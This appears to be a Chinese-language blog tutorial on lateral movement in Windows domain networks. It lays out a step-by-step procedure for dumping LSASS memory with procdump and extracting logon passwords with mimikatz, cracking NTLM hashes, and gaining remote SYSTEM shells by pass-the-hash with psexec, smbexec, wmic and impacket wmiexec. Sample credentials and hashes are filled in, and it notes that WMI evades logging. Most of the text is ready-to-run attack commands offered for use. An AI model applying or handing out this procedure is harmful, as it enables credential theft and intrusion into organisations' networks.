内网渗透-横向移动 二

Procdump+Mimikatz

优点:procdump是微软官方工具不会被系统安全软件查杀

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

把工具移动到内网主机上 执行

procdump -accepteula -ma lsass.exe lsass.dmp

就会生成lsass.dmp的文件


把这个文件复制到自己的电脑上  用mimikatz执行

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

其他工具:Pwdump7   QuarksPwdump

Hashcat 破解获取 Windows NTML Hash

psexec,smbexec

-域横向移动 SMB 服务利用-psexec,smbexec(官方自带)

利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。

#psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递

net use \\192.168.3.32\ipc$ "admin!@#45" /user:ad

ministrator

psexec \\192.168.3.32 -s cmd # 需要先有 ipc 链接 -s 以 System 权限运行

#psexec 第二种:不用建立 IPC 直接提供明文账户密码

psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd

psexec -hashes :$HASH$ ./[email protected]

psexec -hashes :$HASH$ domain/[email protected]

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] 官方 Pstools 无法

采用 hash 连接

这个用win7会提示拒绝访问 用win2008没问题

smbexec 

无需先 ipc 链接 明文或 hash 传递

smbexec god/administrator:[email protected]

smbexec ./administrator:admin!@#[email protected]

smbexec -hashes :$HASH$ ./[email protected]

smbbexec -hashes :$HASH$ domain/[email protected]

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected]

smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/[email protected]

WMI 服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过 135 端口进行利用,支持用户名明文或者 hash

的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

#自带 WMIC 明文传递 无回显

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c

ipconfig >C:\1.txt"


这样就是执行成功   然后使用type命令读取保存得结果

但是需要先执行 net use 命令登录才可以  否则会提示权限不足或者账户密码错误


#自带 cscript 明文传递 有回显

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

vvmiexec.vbs需要自己去网上下载 

使用套件impacket wmiexec

wmiexec ./administrator:admin!@#[email protected] "whoami"

wmiexec god/administrator:[email protected] "whoami"

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] "whoami"

wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] "whoami"

exe版下载地址:https://github.com/maaaaz/impacket-examples-windows

你可能感兴趣的:(内网渗透-横向移动 二)